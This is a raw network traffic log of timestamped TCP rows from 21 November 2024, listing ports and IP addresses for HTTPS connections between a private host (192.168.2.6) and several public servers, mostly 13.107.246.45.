Nov 21, 2024 09:54:38.106738091 CET	49884	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.106749058 CET	443	49884	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.109306097 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.109343052 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.109400034 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.109525919 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.109539986 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.236598969 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.239685059 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.239727974 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.239780903 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.239780903 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.239854097 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.239854097 CET	49885	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.239869118 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.239877939 CET	443	49885	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.242860079 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.242888927 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.242952108 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.243196011 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.243204117 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.886166096 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.886816978 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.886885881 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:38.887209892 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:38.887226105 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.337414980 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.340930939 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.341012955 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.341043949 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.341154099 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.341203928 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.341249943 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.341279030 CET	49888	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.341295004 CET	443	49888	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.344338894 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.344379902 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.344454050 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.344651937 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.344664097 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.870233059 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.870891094 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.870958090 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.871895075 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.871912003 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.888748884 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.889313936 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.889354944 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.890044928 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.890052080 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.958995104 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.959479094 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.959497929 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:39.960125923 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:39.960131884 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.316809893 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.319916964 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.319973946 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.320024967 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.320097923 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.320166111 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.320225954 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.320262909 CET	49890	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.320280075 CET	443	49890	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.322911978 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.322954893 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.323110104 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.323370934 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.323389053 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.335258961 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.338269949 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.338334084 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.338416100 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.338432074 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.338442087 CET	49891	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.338449001 CET	443	49891	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.340908051 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.340960026 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.341037035 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.341242075 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.341264963 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.403948069 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.406801939 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.406860113 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.406977892 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.406989098 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.407002926 CET	49892	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.407008886 CET	443	49892	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.409543037 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.409651041 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.409945011 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.410181999 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:40.410217047 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:40.994901896 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:54:40.995037079 CET	443	49722	185.221.216.102	192.168.2.6
Nov 21, 2024 09:54:40.995136976 CET	49722	443	192.168.2.6	185.221.216.102
Nov 21, 2024 09:54:40.995194912 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:40.995229959 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:40.995304108 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:40.995670080 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:40.995682955 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:41.067115068 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.067662001 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.067682981 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.068114996 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.068120956 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.504203081 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.507281065 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.507436037 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.507524967 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.507549047 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.507565975 CET	49893	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.507574081 CET	443	49893	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.510713100 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.510795116 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:41.510906935 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.511123896 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:41.511152029 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.103137970 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.103652000 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.103667021 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.104093075 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.104098082 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.126450062 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.127453089 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.127477884 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.127821922 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.127827883 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.254580975 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.254968882 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.255012989 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.255343914 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.255357027 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.426937103 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:42.426979065 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:42.427053928 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:42.427687883 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:42.427700996 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:42.429657936 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:42.429971933 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:42.429991007 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:42.430272102 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:42.430608988 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:42.430660963 CET	443	49897	142.250.185.132	192.168.2.6
Nov 21, 2024 09:54:42.477966070 CET	49897	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:54:42.546921015 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.550169945 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.550215006 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.550287962 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.550337076 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.550348997 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.550358057 CET	49894	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.550363064 CET	443	49894	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.553236961 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.553322077 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.553401947 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.553621054 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.553654909 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.568681955 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.572110891 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.572184086 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.572264910 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.572264910 CET	49895	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.572299004 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.572323084 CET	443	49895	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.575999022 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.576024055 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.576200962 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.576462030 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.576472998 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.709760904 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.712949038 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.712997913 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.713099957 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.713177919 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.713177919 CET	49896	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.713219881 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.713251114 CET	443	49896	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.716124058 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.716166019 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:42.716527939 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.716711998 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:42.716732979 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.295429945 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.295949936 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.296010971 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.296412945 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.296426058 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.737472057 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.740762949 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.740828991 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.740870953 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.740897894 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.740916014 CET	49898	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.740922928 CET	443	49898	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.743751049 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.743777990 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.743889093 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.744041920 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:43.744051933 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:43.891330004 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:43.891369104 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:43.891443968 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:43.892003059 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:43.892019033 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.248307943 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.248382092 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.250220060 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.250228882 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.250571012 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.251775980 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.251837969 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.251843929 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.251935005 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.299335957 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.332427979 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.332891941 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.332937956 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.333322048 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.333329916 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.375726938 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.376147985 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.376167059 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.376677990 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.376682997 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.435659885 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.436122894 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.436158895 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.436583042 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.436597109 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.653862953 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.654032946 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.654100895 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.654170036 CET	49899	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:44.654195070 CET	443	49899	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:44.775191069 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.775288105 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.775373936 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.775523901 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.775523901 CET	49900	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.775573015 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.775599003 CET	443	49900	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.778191090 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.778250933 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.778383017 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.778537989 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.778553963 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.825901031 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.825968027 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.826100111 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.826267958 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.826267958 CET	49901	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.826292992 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.826307058 CET	443	49901	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.829003096 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.829049110 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.829114914 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.829288960 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.829304934 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.871377945 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.874505997 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.874564886 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.874567032 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.874644041 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.874679089 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.874679089 CET	49902	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.874711037 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.874733925 CET	443	49902	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.877279043 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.877382994 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:44.877466917 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.877628088 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:44.877657890 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.479954004 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.480477095 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.480495930 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.480971098 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.480976105 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.712986946 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:45.713082075 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:45.718923092 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:45.718935013 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:45.719738007 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:45.721370935 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:45.721426964 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:45.721434116 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:45.721582890 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:45.767338991 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:45.912975073 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.916862011 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.916925907 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.917045116 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.917064905 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.917082071 CET	49903	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.917088032 CET	443	49903	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.919689894 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.919734955 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:45.919851065 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.920073986 CET	49908	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:45.920087099 CET	443	49908	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.120956898 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:46.121062994 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:46.121129036 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:46.121248007 CET	49904	443	192.168.2.6	40.113.103.199
Nov 21, 2024 09:54:46.121263981 CET	443	49904	40.113.103.199	192.168.2.6
Nov 21, 2024 09:54:46.558383942 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.558882952 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:46.558919907 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.559341908 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:46.559351921 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.655468941 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.655953884 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:46.656001091 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.656395912 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:46.656402111 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.673235893 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.673650980 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:46.673672915 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:46.674066067 CET	49906	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:46.674072027 CET	443	49906	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.005630970 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.008694887 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.008764029 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.008763075 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.008805990 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.008862972 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.008887053 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.008899927 CET	49905	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.008917093 CET	443	49905	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.011451006 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.011499882 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.011574030 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.011684895 CET	49909	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.011704922 CET	443	49909	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.099170923 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.102530956 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.102586031 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.102648020 CET	49907	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:47.102683067 CET	443	49907	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:47.102705956 CET	49907	443	192.168.2.6	13.107.246.45
